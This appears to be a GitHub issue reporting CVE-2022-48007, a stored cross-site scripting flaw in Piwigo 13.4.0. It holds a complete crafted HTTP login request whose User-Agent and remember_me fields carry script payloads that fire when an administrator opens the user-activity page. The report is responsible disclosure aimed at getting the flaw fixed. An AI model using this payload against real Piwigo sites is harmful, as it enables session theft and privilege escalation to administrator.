Headline
CVE-2022-48007: Piwigo-13.4.0-Stored XSS Vulnerability in User-Agent · Issue #1835 · Piwigo/Piwigo
A stored cross-site scripting (XSS) vulnerability in identification.php of Piwigo v13.4.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the User-Agent.
Hello, I found Stored XSS in Piwigo version 13.4.0.
Impact:
In this way, ordinary users can be promoted to administrator users.
Here are the complete attack steps:
Register an ordinary user.
Sign out.
POST messages with burpsuite, and change User-Agent’s data to xss-payload. Here’s an example.
POST /src/piwigo/identification.php HTTP/1.1
Host: 192.168.2.153
Content-Length: 98
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.2.153
Content-Type: application/x-www-form-urlencoded
User-Agent: <script>alert(document.cookie);</script> (<svg+onload=alert(1)>) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.2.153/src/piwigo/identification.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: phavsz=1445x798x1.25; pwg_id=ocv8aqqvjkdcshuv99j8l3ctub; pwg_tags_per_page=100; pwg_album_manager_view=tile; PHPSESSID=pfjer613d8pnr8ou8uj458i837
Connection: close
username=w1nd&password=123456&remember_me=<svg+onload=alert(1)>&redirect=&login=%E6%8F%90%E4%BA%A4
- Finally, when the administrator user logs in and visit /admin.php?page=user_activity, the stored xss will be triggered.
/admin.php?page=user_activity
Please fix the vulnerability & let me know :).
Thank You!